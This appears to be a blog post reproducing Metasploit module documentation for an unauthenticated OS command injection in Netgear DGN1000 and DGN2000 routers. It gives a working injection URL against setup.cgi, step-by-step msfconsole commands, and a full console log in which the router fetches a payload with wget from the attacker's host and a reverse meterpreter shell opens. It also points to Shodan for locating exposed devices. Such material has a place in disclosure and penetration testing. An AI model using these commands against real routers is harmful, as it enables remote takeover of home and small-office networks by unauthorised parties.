unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000

by do son · Published · Updated

Shodmon

netgear_dgn1000_setup_unauth_exec

The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to 1.1.00.48 in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the syscmd fuction of the setup.cgi script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example: http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/&currentsetting.htm=1. Such example will return “vulnerable” on the page. Vulnerable models have wget installed on /usr/bin/wget and can be leveraged to drop a MIPS Big Endian payload.

Vulnerable Application

Netgear DGN1000 with firmware versions up to 1.1.00.48 and DGN2000v1 models

Verification Steps

  1. Start msfconsole
  2. Do : use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
  3. Do : set RHOST [RouterIP]
  4. Do : set PAYLOAD [payload]
  5. Do : run
  6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain a session

    msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_execmsf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
    RHOST => 192.168.0.1
    msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
    RPORT => 80
    msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0
    LHOST = eth0
    msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
    PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
    msf exploit(netgear_dgn1000_setup_unauth_exec) > run

    [*] Started reverse TCP handler on 192.168.0.11:4444
    [*] 192.168.0.1:80 – Connecting to target…
    [*] 192.168.0.1:80 – Exploiting target ….
    [*] Using URL: http://0.0.0.0:8080/DnuJhOHYg7auIz
    [*] Local IP: http://192.168.0.11:8080/DnuJhOHYg7auIz
    [*] Client 192.168.0.1 (Wget) requested /DnuJhOHYg7auIz
    [*] Sending payload to 192.168.0.1 (Wget)
    [*] Sending stage (1073332 bytes) to 192.168.0.1
    [*] Meterpreter session 2 opened (192.168.0.11:4444 -> 192.168.0.1:51558) at 2017-10-20 20:37:06 -0400
    [*] Command Stager progress – 100.00% done (129/129 bytes)
    [*] Server stopped.

    meterpreter > sysinfo
    Computer : 192.168.0.1
    OS : (Linux 2.6.20-Amazon_SE)
    Architecture : mips
    Meterpreter : mipsbe/linux
    meterpreter >

Shodan result

Source: https://github.com/rapid7/metasploit-framework

Tags: Netgear DGN1000os command injection